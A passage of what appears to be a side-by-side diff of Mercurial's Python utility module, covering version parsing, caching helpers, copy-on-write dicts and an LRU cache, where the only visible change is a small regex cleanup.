1123 >>> versiontuple(v, 3)
1123 >>> versiontuple(v, 3)
1124 (3, 6, 1)
1124 (3, 6, 1)
1125 >>> versiontuple(v, 4)
1125 >>> versiontuple(v, 4)
1126 (3, 6, 1, '190-df9b73d2d444')
1126 (3, 6, 1, '190-df9b73d2d444')
1127
1127
1128 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1128 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1129 (3, 6, 1, '190-df9b73d2d444+20151118')
1129 (3, 6, 1, '190-df9b73d2d444+20151118')
1130
1130
1131 >>> v = b'3.6'
1131 >>> v = b'3.6'
1132 >>> versiontuple(v, 2)
1132 >>> versiontuple(v, 2)
1133 (3, 6)
1133 (3, 6)
1134 >>> versiontuple(v, 3)
1134 >>> versiontuple(v, 3)
1135 (3, 6, None)
1135 (3, 6, None)
1136 >>> versiontuple(v, 4)
1136 >>> versiontuple(v, 4)
1137 (3, 6, None, None)
1137 (3, 6, None, None)
1138
1138
1139 >>> v = b'3.9-rc'
1139 >>> v = b'3.9-rc'
1140 >>> versiontuple(v, 2)
1140 >>> versiontuple(v, 2)
1141 (3, 9)
1141 (3, 9)
1142 >>> versiontuple(v, 3)
1142 >>> versiontuple(v, 3)
1143 (3, 9, None)
1143 (3, 9, None)
1144 >>> versiontuple(v, 4)
1144 >>> versiontuple(v, 4)
1145 (3, 9, None, 'rc')
1145 (3, 9, None, 'rc')
1146
1146
1147 >>> v = b'3.9-rc+2-02a8fea4289b'
1147 >>> v = b'3.9-rc+2-02a8fea4289b'
1148 >>> versiontuple(v, 2)
1148 >>> versiontuple(v, 2)
1149 (3, 9)
1149 (3, 9)
1150 >>> versiontuple(v, 3)
1150 >>> versiontuple(v, 3)
1151 (3, 9, None)
1151 (3, 9, None)
1152 >>> versiontuple(v, 4)
1152 >>> versiontuple(v, 4)
1153 (3, 9, None, 'rc+2-02a8fea4289b')
1153 (3, 9, None, 'rc+2-02a8fea4289b')
1154
1154
1155 >>> versiontuple(b'4.6rc0')
1155 >>> versiontuple(b'4.6rc0')
1156 (4, 6, None, 'rc0')
1156 (4, 6, None, 'rc0')
1157 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1157 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1158 (4, 6, None, 'rc0+12-425d55e54f98')
1158 (4, 6, None, 'rc0+12-425d55e54f98')
1159 >>> versiontuple(b'.1.2.3')
1159 >>> versiontuple(b'.1.2.3')
1160 (None, None, None, '.1.2.3')
1160 (None, None, None, '.1.2.3')
1161 >>> versiontuple(b'12.34..5')
1161 >>> versiontuple(b'12.34..5')
1162 (12, 34, None, '..5')
1162 (12, 34, None, '..5')
1163 >>> versiontuple(b'1.2.3.4.5.6')
1163 >>> versiontuple(b'1.2.3.4.5.6')
1164 (1, 2, 3, '.4.5.6')
1164 (1, 2, 3, '.4.5.6')
1165 """
1165 """
1166 if not v:
1166 if not v:
1167 v = version()
1167 v = version()
1168 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1168 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1169 if not m:
1169 if not m:
1170 vparts, extra = b'', v
1170 vparts, extra = b'', v
1171 elif m.group(2):
1171 elif m.group(2):
1172 vparts, extra = m.groups()
1172 vparts, extra = m.groups()
1173 else:
1173 else:
1174 vparts, extra = m.group(1), None
1174 vparts, extra = m.group(1), None
1175
1175
1176 assert vparts is not None # help pytype
1176 assert vparts is not None # help pytype
1177
1177
1178 vints = []
1178 vints = []
1179 for i in vparts.split(b'.'):
1179 for i in vparts.split(b'.'):
1180 try:
1180 try:
1181 vints.append(int(i))
1181 vints.append(int(i))
1182 except ValueError:
1182 except ValueError:
1183 break
1183 break
1184 # (3, 6) -> (3, 6, None)
1184 # (3, 6) -> (3, 6, None)
1185 while len(vints) < 3:
1185 while len(vints) < 3:
1186 vints.append(None)
1186 vints.append(None)
1187
1187
1188 if n == 2:
1188 if n == 2:
1189 return (vints[0], vints[1])
1189 return (vints[0], vints[1])
1190 if n == 3:
1190 if n == 3:
1191 return (vints[0], vints[1], vints[2])
1191 return (vints[0], vints[1], vints[2])
1192 if n == 4:
1192 if n == 4:
1193 return (vints[0], vints[1], vints[2], extra)
1193 return (vints[0], vints[1], vints[2], extra)
1194
1194
1195
1195
1196 def cachefunc(func):
1196 def cachefunc(func):
1197 '''cache the result of function calls'''
1197 '''cache the result of function calls'''
1198 # XXX doesn't handle keywords args
1198 # XXX doesn't handle keywords args
1199 if func.__code__.co_argcount == 0:
1199 if func.__code__.co_argcount == 0:
1200 listcache = []
1200 listcache = []
1201
1201
1202 def f():
1202 def f():
1203 if len(listcache) == 0:
1203 if len(listcache) == 0:
1204 listcache.append(func())
1204 listcache.append(func())
1205 return listcache[0]
1205 return listcache[0]
1206
1206
1207 return f
1207 return f
1208 cache = {}
1208 cache = {}
1209 if func.__code__.co_argcount == 1:
1209 if func.__code__.co_argcount == 1:
1210 # we gain a small amount of time because
1210 # we gain a small amount of time because
1211 # we don't need to pack/unpack the list
1211 # we don't need to pack/unpack the list
1212 def f(arg):
1212 def f(arg):
1213 if arg not in cache:
1213 if arg not in cache:
1214 cache[arg] = func(arg)
1214 cache[arg] = func(arg)
1215 return cache[arg]
1215 return cache[arg]
1216
1216
1217 else:
1217 else:
1218
1218
1219 def f(*args):
1219 def f(*args):
1220 if args not in cache:
1220 if args not in cache:
1221 cache[args] = func(*args)
1221 cache[args] = func(*args)
1222 return cache[args]
1222 return cache[args]
1223
1223
1224 return f
1224 return f
1225
1225
1226
1226
1227 class cow(object):
1227 class cow(object):
1228 """helper class to make copy-on-write easier
1228 """helper class to make copy-on-write easier
1229
1229
1230 Call preparewrite before doing any writes.
1230 Call preparewrite before doing any writes.
1231 """
1231 """
1232
1232
1233 def preparewrite(self):
1233 def preparewrite(self):
1234 """call this before writes, return self or a copied new object"""
1234 """call this before writes, return self or a copied new object"""
1235 if getattr(self, '_copied', 0):
1235 if getattr(self, '_copied', 0):
1236 self._copied -= 1
1236 self._copied -= 1
1237 return self.__class__(self)
1237 return self.__class__(self)
1238 return self
1238 return self
1239
1239
1240 def copy(self):
1240 def copy(self):
1241 """always do a cheap copy"""
1241 """always do a cheap copy"""
1242 self._copied = getattr(self, '_copied', 0) + 1
1242 self._copied = getattr(self, '_copied', 0) + 1
1243 return self
1243 return self
1244
1244
1245
1245
1246 class sortdict(collections.OrderedDict):
1246 class sortdict(collections.OrderedDict):
1247 '''a simple sorted dictionary
1247 '''a simple sorted dictionary
1248
1248
1249 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1249 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1250 >>> d2 = d1.copy()
1250 >>> d2 = d1.copy()
1251 >>> d2
1251 >>> d2
1252 sortdict([('a', 0), ('b', 1)])
1252 sortdict([('a', 0), ('b', 1)])
1253 >>> d2.update([(b'a', 2)])
1253 >>> d2.update([(b'a', 2)])
1254 >>> list(d2.keys()) # should still be in last-set order
1254 >>> list(d2.keys()) # should still be in last-set order
1255 ['b', 'a']
1255 ['b', 'a']
1256 >>> d1.insert(1, b'a.5', 0.5)
1256 >>> d1.insert(1, b'a.5', 0.5)
1257 >>> d1
1257 >>> d1
1258 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1258 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1259 '''
1259 '''
1260
1260
1261 def __setitem__(self, key, value):
1261 def __setitem__(self, key, value):
1262 if key in self:
1262 if key in self:
1263 del self[key]
1263 del self[key]
1264 super(sortdict, self).__setitem__(key, value)
1264 super(sortdict, self).__setitem__(key, value)
1265
1265
1266 if pycompat.ispypy:
1266 if pycompat.ispypy:
1267 # __setitem__() isn't called as of PyPy 5.8.0
1267 # __setitem__() isn't called as of PyPy 5.8.0
1268 def update(self, src):
1268 def update(self, src):
1269 if isinstance(src, dict):
1269 if isinstance(src, dict):
1270 src = pycompat.iteritems(src)
1270 src = pycompat.iteritems(src)
1271 for k, v in src:
1271 for k, v in src:
1272 self[k] = v
1272 self[k] = v
1273
1273
1274 def insert(self, position, key, value):
1274 def insert(self, position, key, value):
1275 for (i, (k, v)) in enumerate(list(self.items())):
1275 for (i, (k, v)) in enumerate(list(self.items())):
1276 if i == position:
1276 if i == position:
1277 self[key] = value
1277 self[key] = value
1278 if i >= position:
1278 if i >= position:
1279 del self[k]
1279 del self[k]
1280 self[k] = v
1280 self[k] = v
1281
1281
1282
1282
1283 class cowdict(cow, dict):
1283 class cowdict(cow, dict):
1284 """copy-on-write dict
1284 """copy-on-write dict
1285
1285
1286 Be sure to call d = d.preparewrite() before writing to d.
1286 Be sure to call d = d.preparewrite() before writing to d.
1287
1287
1288 >>> a = cowdict()
1288 >>> a = cowdict()
1289 >>> a is a.preparewrite()
1289 >>> a is a.preparewrite()
1290 True
1290 True
1291 >>> b = a.copy()
1291 >>> b = a.copy()
1292 >>> b is a
1292 >>> b is a
1293 True
1293 True
1294 >>> c = b.copy()
1294 >>> c = b.copy()
1295 >>> c is a
1295 >>> c is a
1296 True
1296 True
1297 >>> a = a.preparewrite()
1297 >>> a = a.preparewrite()
1298 >>> b is a
1298 >>> b is a
1299 False
1299 False
1300 >>> a is a.preparewrite()
1300 >>> a is a.preparewrite()
1301 True
1301 True
1302 >>> c = c.preparewrite()
1302 >>> c = c.preparewrite()
1303 >>> b is c
1303 >>> b is c
1304 False
1304 False
1305 >>> b is b.preparewrite()
1305 >>> b is b.preparewrite()
1306 True
1306 True
1307 """
1307 """
1308
1308
1309
1309
1310 class cowsortdict(cow, sortdict):
1310 class cowsortdict(cow, sortdict):
1311 """copy-on-write sortdict
1311 """copy-on-write sortdict
1312
1312
1313 Be sure to call d = d.preparewrite() before writing to d.
1313 Be sure to call d = d.preparewrite() before writing to d.
1314 """
1314 """
1315
1315
1316
1316
1317 class transactional(object): # pytype: disable=ignored-metaclass
1317 class transactional(object): # pytype: disable=ignored-metaclass
1318 """Base class for making a transactional type into a context manager."""
1318 """Base class for making a transactional type into a context manager."""
1319
1319
1320 __metaclass__ = abc.ABCMeta
1320 __metaclass__ = abc.ABCMeta
1321
1321
1322 @abc.abstractmethod
1322 @abc.abstractmethod
1323 def close(self):
1323 def close(self):
1324 """Successfully closes the transaction."""
1324 """Successfully closes the transaction."""
1325
1325
1326 @abc.abstractmethod
1326 @abc.abstractmethod
1327 def release(self):
1327 def release(self):
1328 """Marks the end of the transaction.
1328 """Marks the end of the transaction.
1329
1329
1330 If the transaction has not been closed, it will be aborted.
1330 If the transaction has not been closed, it will be aborted.
1331 """
1331 """
1332
1332
1333 def __enter__(self):
1333 def __enter__(self):
1334 return self
1334 return self
1335
1335
1336 def __exit__(self, exc_type, exc_val, exc_tb):
1336 def __exit__(self, exc_type, exc_val, exc_tb):
1337 try:
1337 try:
1338 if exc_type is None:
1338 if exc_type is None:
1339 self.close()
1339 self.close()
1340 finally:
1340 finally:
1341 self.release()
1341 self.release()
1342
1342
1343
1343
1344 @contextlib.contextmanager
1344 @contextlib.contextmanager
1345 def acceptintervention(tr=None):
1345 def acceptintervention(tr=None):
1346 """A context manager that closes the transaction on InterventionRequired
1346 """A context manager that closes the transaction on InterventionRequired
1347
1347
1348 If no transaction was provided, this simply runs the body and returns
1348 If no transaction was provided, this simply runs the body and returns
1349 """
1349 """
1350 if not tr:
1350 if not tr:
1351 yield
1351 yield
1352 return
1352 return
1353 try:
1353 try:
1354 yield
1354 yield
1355 tr.close()
1355 tr.close()
1356 except error.InterventionRequired:
1356 except error.InterventionRequired:
1357 tr.close()
1357 tr.close()
1358 raise
1358 raise
1359 finally:
1359 finally:
1360 tr.release()
1360 tr.release()
1361
1361
1362
1362
1363 @contextlib.contextmanager
1363 @contextlib.contextmanager
1364 def nullcontextmanager():
1364 def nullcontextmanager():
1365 yield
1365 yield
1366
1366
1367
1367
1368 class _lrucachenode(object):
1368 class _lrucachenode(object):
1369 """A node in a doubly linked list.
1369 """A node in a doubly linked list.
1370
1370
1371 Holds a reference to nodes on either side as well as a key-value
1371 Holds a reference to nodes on either side as well as a key-value
1372 pair for the dictionary entry.
1372 pair for the dictionary entry.
1373 """
1373 """
1374
1374
1375 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1375 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1376
1376
1377 def __init__(self):
1377 def __init__(self):
1378 self.next = None
1378 self.next = None
1379 self.prev = None
1379 self.prev = None
1380
1380
1381 self.key = _notset
1381 self.key = _notset
1382 self.value = None
1382 self.value = None
1383 self.cost = 0
1383 self.cost = 0
1384
1384
1385 def markempty(self):
1385 def markempty(self):
1386 """Mark the node as emptied."""
1386 """Mark the node as emptied."""
1387 self.key = _notset
1387 self.key = _notset
1388 self.value = None
1388 self.value = None
1389 self.cost = 0
1389 self.cost = 0
1390
1390
1391
1391
1392 class lrucachedict(object):
1392 class lrucachedict(object):
1393 """Dict that caches most recent accesses and sets.
1393 """Dict that caches most recent accesses and sets.
1394
1394
1395 The dict consists of an actual backing dict - indexed by original
1395 The dict consists of an actual backing dict - indexed by original
1396 key - and a doubly linked circular list defining the order of entries in
1396 key - and a doubly linked circular list defining the order of entries in
1397 the cache.
1397 the cache.
1398
1398
1399 The head node is the newest entry in the cache. If the cache is full,
1399 The head node is the newest entry in the cache. If the cache is full,
1400 we recycle head.prev and make it the new head. Cache accesses result in
1400 we recycle head.prev and make it the new head. Cache accesses result in
1401 the node being moved to before the existing head and being marked as the
1401 the node being moved to before the existing head and being marked as the
1402 new head node.
1402 new head node.
1403
1403
1404 Items in the cache can be inserted with an optional "cost" value. This is
1404 Items in the cache can be inserted with an optional "cost" value. This is
1405 simply an integer that is specified by the caller. The cache can be queried
1405 simply an integer that is specified by the caller. The cache can be queried
1406 for the total cost of all items presently in the cache.
1406 for the total cost of all items presently in the cache.
1407
1407
1408 The cache can also define a maximum cost. If a cache insertion would
1408 The cache can also define a maximum cost. If a cache insertion would
1409 cause the total cost of the cache to go beyond the maximum cost limit,
1409 cause the total cost of the cache to go beyond the maximum cost limit,
1410 nodes will be evicted to make room for the new code. This can be used
1410 nodes will be evicted to make room for the new code. This can be used
1411 to e.g. set a max memory limit and associate an estimated bytes size
1411 to e.g. set a max memory limit and associate an estimated bytes size
1412 cost to each item in the cache. By default, no maximum cost is enforced.
1412 cost to each item in the cache. By default, no maximum cost is enforced.
1413 """
1413 """
1414
1414
1415 def __init__(self, max, maxcost=0):
1415 def __init__(self, max, maxcost=0):
1416 self._cache = {}
1416 self._cache = {}
1417
1417
1418 self._head = head = _lrucachenode()
1418 self._head = head = _lrucachenode()
1419 head.prev = head
1419 head.prev = head
1420 head.next = head
1420 head.next = head
1421 self._size = 1
1421 self._size = 1
1422 self.capacity = max
1422 self.capacity = max
1423 self.totalcost = 0
1423 self.totalcost = 0
1424 self.maxcost = maxcost
1424 self.maxcost = maxcost
1425
1425
1426 def __len__(self):
1426 def __len__(self):
1427 return len(self._cache)
1427 return len(self._cache)
1428
1428
1429 def __contains__(self, k):
1429 def __contains__(self, k):
1430 return k in self._cache
1430 return k in self._cache
1431
1431
1432 def __iter__(self):
1432 def __iter__(self):
1433 # We don't have to iterate in cache order, but why not.
1433 # We don't have to iterate in cache order, but why not.
1434 n = self._head
1434 n = self._head
1435 for i in range(len(self._cache)):
1435 for i in range(len(self._cache)):
1436 yield n.key
1436 yield n.key
1437 n = n.next
1437 n = n.next
1438
1438
1439 def __getitem__(self, k):
1439 def __getitem__(self, k):
1440 node = self._cache[k]
1440 node = self._cache[k]
1441 self._movetohead(node)
1441 self._movetohead(node)
1442 return node.value
1442 return node.value
1443
1443
1444 def insert(self, k, v, cost=0):
1444 def insert(self, k, v, cost=0):
1445 """Insert a new item in the cache with optional cost value."""
1445 """Insert a new item in the cache with optional cost value."""
1446 node = self._cache.get(k)
1446 node = self._cache.get(k)
1447 # Replace existing value and mark as newest.
1447 # Replace existing value and mark as newest.
1448 if node is not None:
1448 if node is not None:
1449 self.totalcost -= node.cost
1449 self.totalcost -= node.cost
1450 node.value = v
1450 node.value = v
1451 node.cost = cost
1451 node.cost = cost
1452 self.totalcost += cost
1452 self.totalcost += cost
1453 self._movetohead(node)
1453 self._movetohead(node)
1454
1454
1455 if self.maxcost:
1455 if self.maxcost:
1456 self._enforcecostlimit()
1456 self._enforcecostlimit()
1457
1457
1458 return
1458 return
1459
1459
1460 if self._size < self.capacity:
1460 if self._size < self.capacity:
1461 node = self._addcapacity()
1461 node = self._addcapacity()
1462 else:
1462 else:
1463 # Grab the last/oldest item.
1463 # Grab the last/oldest item.
1464 node = self._head.prev
1464 node = self._head.prev
1465
1465
1466 # At capacity. Kill the old entry.
1466 # At capacity. Kill the old entry.
1467 if node.key is not _notset:
1467 if node.key is not _notset:
1468 self.totalcost -= node.cost
1468 self.totalcost -= node.cost
1469 del self._cache[node.key]
1469 del self._cache[node.key]
1470
1470
1471 node.key = k
1471 node.key = k
1472 node.value = v
1472 node.value = v
1473 node.cost = cost
1473 node.cost = cost
1474 self.totalcost += cost
1474 self.totalcost += cost
1475 self._cache[k] = node
1475 self._cache[k] = node
1476 # And mark it as newest entry. No need to adjust order since it
1476 # And mark it as newest entry. No need to adjust order since it
1477 # is already self._head.prev.
1477 # is already self._head.prev.
1478 self._head = node
1478 self._head = node
1479
1479
1480 if self.maxcost:
1480 if self.maxcost:
1481 self._enforcecostlimit()
1481 self._enforcecostlimit()
1482
1482
1483 def __setitem__(self, k, v):
1483 def __setitem__(self, k, v):
1484 self.insert(k, v)
1484 self.insert(k, v)
1485
1485
1486 def __delitem__(self, k):
1486 def __delitem__(self, k):
1487 self.pop(k)
1487 self.pop(k)
1488
1488
1489 def pop(self, k, default=_notset):
1489 def pop(self, k, default=_notset):
1490 try:
1490 try:
1491 node = self._cache.pop(k)
1491 node = self._cache.pop(k)
1492 except KeyError:
1492 except KeyError:
1493 if default is _notset:
1493 if default is _notset:
1494 raise
1494 raise
1495 return default
1495 return default
1496
1496
1497 assert node is not None # help pytype
1497 assert node is not None # help pytype
1498 value = node.value
1498 value = node.value
1499 self.totalcost -= node.cost
1499 self.totalcost -= node.cost
1500 node.markempty()
1500 node.markempty()
1501
1501
1502 # Temporarily mark as newest item before re-adjusting head to make
1502 # Temporarily mark as newest item before re-adjusting head to make
1503 # this node the oldest item.
1503 # this node the oldest item.
1504 self._movetohead(node)
1504 self._movetohead(node)
1505 self._head = node.next
1505 self._head = node.next
1506
1506
1507 return value
1507 return value
1508
1508
1509 # Additional dict methods.
1509 # Additional dict methods.
1510
1510
1511 def get(self, k, default=None):
1511 def get(self, k, default=None):
1512 try:
1512 try:
1513 return self.__getitem__(k)
1513 return self.__getitem__(k)
1514 except KeyError:
1514 except KeyError:
1515 return default
1515 return default
1516
1516
1517 def peek(self, k, default=_notset):
1517 def peek(self, k, default=_notset):
1518 """Get the specified item without moving it to the head
1518 """Get the specified item without moving it to the head
1519
1519
1520 Unlike get(), this doesn't mutate the internal state. But be aware
1520 Unlike get(), this doesn't mutate the internal state. But be aware
1521 that it doesn't mean peek() is thread safe.
1521 that it doesn't mean peek() is thread safe.
1522 """
1522 """
1523 try:
1523 try:
1524 node = self._cache[k]
1524 node = self._cache[k]
1525 return node.value
1525 return node.value
1526 except KeyError:
1526 except KeyError:
1527 if default is _notset:
1527 if default is _notset:
1528 raise
1528 raise
1529 return default
1529 return default
1530
1530
1531 def clear(self):
1531 def clear(self):
1532 n = self._head
1532 n = self._head
1533 while n.key is not _notset:
1533 while n.key is not _notset:
1534 self.totalcost -= n.cost
1534 self.totalcost -= n.cost
1535 n.markempty()
1535 n.markempty()
1536 n = n.next
1536 n = n.next
1537
1537
1538 self._cache.clear()
1538 self._cache.clear()
1539
1539
1540 def copy(self, capacity=None, maxcost=0):
1540 def copy(self, capacity=None, maxcost=0):
1541 """Create a new cache as a copy of the current one.
1541 """Create a new cache as a copy of the current one.
1542
1542
1543 By default, the new cache has the same capacity as the existing one.
1543 By default, the new cache has the same capacity as the existing one.
1544 But, the cache capacity can be changed as part of performing the
1544 But, the cache capacity can be changed as part of performing the
1545 copy.
1545 copy.
1546
1546
1547 Items in the copy have an insertion/access order matching this
1547 Items in the copy have an insertion/access order matching this
1548 instance.
1548 instance.
1549 """
1549 """
1550
1550
1551 capacity = capacity or self.capacity
1551 capacity = capacity or self.capacity
1552 maxcost = maxcost or self.maxcost
1552 maxcost = maxcost or self.maxcost
1553 result = lrucachedict(capacity, maxcost=maxcost)
1553 result = lrucachedict(capacity, maxcost=maxcost)
1554
1554
1555 # We copy entries by iterating in oldest-to-newest order so the copy
1555 # We copy entries by iterating in oldest-to-newest order so the copy
1556 # has the correct ordering.
1556 # has the correct ordering.
1557
1557
1558 # Find the first non-empty entry.
1558 # Find the first non-empty entry.
1559 n = self._head.prev
1559 n = self._head.prev
1560 while n.key is _notset and n is not self._head:
1560 while n.key is _notset and n is not self._head:
1561 n = n.prev
1561 n = n.prev
1562
1562
1563 # We could potentially skip the first N items when decreasing capacity.
1563 # We could potentially skip the first N items when decreasing capacity.
1564 # But let's keep it simple unless it is a performance problem.
1564 # But let's keep it simple unless it is a performance problem.
1565 for i in range(len(self._cache)):
1565 for i in range(len(self._cache)):
1566 result.insert(n.key, n.value, cost=n.cost)
1566 result.insert(n.key, n.value, cost=n.cost)
1567 n = n.prev
1567 n = n.prev
1568
1568
1569 return result
1569 return result
1570
1570
1571 def popoldest(self):
1571 def popoldest(self):
1572 """Remove the oldest item from the cache.
1572 """Remove the oldest item from the cache.
1573
1573
1574 Returns the (key, value) describing the removed cache entry.
1574 Returns the (key, value) describing the removed cache entry.
1575 """
1575 """
1576 if not self._cache:
1576 if not self._cache:
1577 return
1577 return
1578
1578
1579 # Walk the linked list backwards starting at tail node until we hit
1579 # Walk the linked list backwards starting at tail node until we hit
1580 # a non-empty node.
1580 # a non-empty node.
1581 n = self._head.prev
1581 n = self._head.prev
1582 while n.key is _notset:
1582 while n.key is _notset:
1583 n = n.prev
1583 n = n.prev
1584
1584
1585 assert n is not None # help pytype
1585 assert n is not None # help pytype
1586
1586
1587 key, value = n.key, n.value
1587 key, value = n.key, n.value
1588
1588
1589 # And remove it from the cache and mark it as empty.
1589 # And remove it from the cache and mark it as empty.
1590 del self._cache[n.key]
1590 del self._cache[n.key]
1591 self.totalcost -= n.cost
1591 self.totalcost -= n.cost
1592 n.markempty()
1592 n.markempty()
1593
1593
1594 return key, value
1594 return key, value
1595
1595
1596 def _movetohead(self, node):
1596 def _movetohead(self, node):
1597 """Mark a node as the newest, making it the new head.
1597 """Mark a node as the newest, making it the new head.
1598
1598
1599 When a node is accessed, it becomes the freshest entry in the LRU
1599 When a node is accessed, it becomes the freshest entry in the LRU
1600 list, which is denoted by self._head.
1600 list, which is denoted by self._head.
1601
1601
1602 Visually, let's make ``N`` the new head node (* denotes head):
1602 Visually, let's make ``N`` the new head node (* denotes head):
1603
1603
1604 previous/oldest <-> head <-> next/next newest
1604 previous/oldest <-> head <-> next/next newest
1605
1605
1606 ----<->--- A* ---<->-----
1606 ----<->--- A* ---<->-----
1607 | |
1607 | |
1608 E <-> D <-> N <-> C <-> B
1608 E <-> D <-> N <-> C <-> B
1609
1609
1610 To:
1610 To:
1611
1611
1612 ----<->--- N* ---<->-----
1612 ----<->--- N* ---<->-----
1613 | |
1613 | |
1614 E <-> D <-> C <-> B <-> A
1614 E <-> D <-> C <-> B <-> A
1615
1615
1616 This requires the following moves:
1616 This requires the following moves:
1617
1617
1618 C.next = D (node.prev.next = node.next)
1618 C.next = D (node.prev.next = node.next)
1619 D.prev = C (node.next.prev = node.prev)
1619 D.prev = C (node.next.prev = node.prev)
1620 E.next = N (head.prev.next = node)
1620 E.next = N (head.prev.next = node)
1621 N.prev = E (node.prev = head.prev)
1621 N.prev = E (node.prev = head.prev)
1622 N.next = A (node.next = head)
1622 N.next = A (node.next = head)
1623 A.prev = N (head.prev = node)
1623 A.prev = N (head.prev = node)
1624 """
1624 """
1625 head = self._head
1625 head = self._head
1626 # C.next = D
1626 # C.next = D
1627 node.prev.next = node.next
1627 node.prev.next = node.next
1628 # D.prev = C
1628 # D.prev = C
1629 node.next.prev = node.prev
1629 node.next.prev = node.prev
1630 # N.prev = E
1630 # N.prev = E
1631 node.prev = head.prev
1631 node.prev = head.prev
1632 # N.next = A
1632 # N.next = A
1633 # It is tempting to do just "head" here, however if node is
1633 # It is tempting to do just "head" here, however if node is
1634 # adjacent to head, this will do bad things.
1634 # adjacent to head, this will do bad things.
1635 node.next = head.prev.next
1635 node.next = head.prev.next
1636 # E.next = N
1636 # E.next = N
1637 node.next.prev = node
1637 node.next.prev = node
1638 # A.prev = N
1638 # A.prev = N
1639 node.prev.next = node
1639 node.prev.next = node
1640
1640
1641 self._head = node
1641 self._head = node
1642
1642
1643 def _addcapacity(self):
1643 def _addcapacity(self):
1644 """Add a node to the circular linked list.
1644 """Add a node to the circular linked list.
1645
1645
1646 The new node is inserted before the head node.
1646 The new node is inserted before the head node.
1647 """
1647 """
1648 head = self._head
1648 head = self._head
1649 node = _lrucachenode()
1649 node = _lrucachenode()
1650 head.prev.next = node
1650 head.prev.next = node
1651 node.prev = head.prev
1651 node.prev = head.prev
1652 node.next = head
1652 node.next = head
1653 head.prev = node
1653 head.prev = node
1654 self._size += 1
1654 self._size += 1
1655 return node
1655 return node
1656
1656
1657 def _enforcecostlimit(self):
1657 def _enforcecostlimit(self):
1658 # This should run after an insertion. It should only be called if total
1658 # This should run after an insertion. It should only be called if total
1659 # cost limits are being enforced.
1659 # cost limits are being enforced.
1660 # The most recently inserted node is never evicted.
1660 # The most recently inserted node is never evicted.
1661 if len(self) <= 1 or self.totalcost <= self.maxcost:
1661 if len(self) <= 1 or self.totalcost <= self.maxcost:
1662 return
1662 return
1663
1663
1664 # This is logically equivalent to calling popoldest() until we
1664 # This is logically equivalent to calling popoldest() until we
1665 # free up enough cost. We don't do that since popoldest() needs
1665 # free up enough cost. We don't do that since popoldest() needs
1666 # to walk the linked list and doing this in a loop would be
1666 # to walk the linked list and doing this in a loop would be
1667 # quadratic. So we find the first non-empty node and then
1667 # quadratic. So we find the first non-empty node and then
1668 # walk nodes until we free up enough capacity.
1668 # walk nodes until we free up enough capacity.
1669 #
1669 #
1670 # If we only removed the minimum number of nodes to free enough
1670 # If we only removed the minimum number of nodes to free enough
1671 # cost at insert time, chances are high that the next insert would
1671 # cost at insert time, chances are high that the next insert would
1672 # also require pruning. This would effectively constitute quadratic
1672 # also require pruning. This would effectively constitute quadratic
1673 # behavior for insert-heavy workloads. To mitigate this, we set a
1673 # behavior for insert-heavy workloads. To mitigate this, we set a
1674 # target cost that is a percentage of the max cost. This will tend
1674 # target cost that is a percentage of the max cost. This will tend
1675 # to free more nodes when the high water mark is reached, which
1675 # to free more nodes when the high water mark is reached, which
1676 # lowers the chances of needing to prune on the subsequent insert.
1676 # lowers the chances of needing to prune on the subsequent insert.
1677 targetcost = int(self.maxcost * 0.75)
1677 targetcost = int(self.maxcost * 0.75)
1678
1678
1679 n = self._head.prev
1679 n = self._head.prev
1680 while n.key is _notset:
1680 while n.key is _notset:
1681 n = n.prev
1681 n = n.prev
1682
1682
1683 while len(self) > 1 and self.totalcost > targetcost:
1683 while len(self) > 1 and self.totalcost > targetcost:
1684 del self._cache[n.key]
1684 del self._cache[n.key]
1685 self.totalcost -= n.cost
1685 self.totalcost -= n.cost
1686 n.markempty()
1686 n.markempty()
1687 n = n.prev
1687 n = n.prev
1688
1688
1689
1689
1690 def lrucachefunc(func):
1690 def lrucachefunc(func):
1691 '''cache most recent results of function calls'''
1691 '''cache most recent results of function calls'''
1692 cache = {}
1692 cache = {}
1693 order = collections.deque()
1693 order = collections.deque()
1694 if func.__code__.co_argcount == 1:
1694 if func.__code__.co_argcount == 1:
1695
1695
1696 def f(arg):
1696 def f(arg):
1697 if arg not in cache:
1697 if arg not in cache:
1698 if len(cache) > 20:
1698 if len(cache) > 20:
1699 del cache[order.popleft()]
1699 del cache[order.popleft()]
1700 cache[arg] = func(arg)
1700 cache[arg] = func(arg)
1701 else:
1701 else:
1702 order.remove(arg)
1702 order.remove(arg)
1703 order.append(arg)
1703 order.append(arg)
1704 return cache[arg]
1704 return cache[arg]
1705
1705
1706 else:
1706 else:
1707
1707
1708 def f(*args):
1708 def f(*args):
1709 if args not in cache:
1709 if args not in cache:
1710 if len(cache) > 20:
1710 if len(cache) > 20:
1711 del cache[order.popleft()]
1711 del cache[order.popleft()]
1712 cache[args] = func(*args)
1712 cache[args] = func(*args)
1713 else:
1713 else:
1714 order.remove(args)
1714 order.remove(args)
1715 order.append(args)
1715 order.append(args)
1716 return cache[args]
1716 return cache[args]
1717
1717
1718 return f
1718 return f
1719
1719
1720
1720
1721 class propertycache(object):
1721 class propertycache(object):
1722 def __init__(self, func):
1722 def __init__(self, func):
1723 self.func = func
1723 self.func = func
1724 self.name = func.__name__
1724 self.name = func.__name__
1725
1725
1726 def __get__(self, obj, type=None):
1726 def __get__(self, obj, type=None):
1727 result = self.func(obj)
1727 result = self.func(obj)
1728 self.cachevalue(obj, result)
1728 self.cachevalue(obj, result)
1729 return result
1729 return result
1730
1730
1731 def cachevalue(self, obj, value):
1731 def cachevalue(self, obj, value):
1732 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1732 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1733 obj.__dict__[self.name] = value
1733 obj.__dict__[self.name] = value
1734
1734
1735
1735
1736 def clearcachedproperty(obj, prop):
1736 def clearcachedproperty(obj, prop):
1737 '''clear a cached property value, if one has been set'''
1737 '''clear a cached property value, if one has been set'''
1738 prop = pycompat.sysstr(prop)
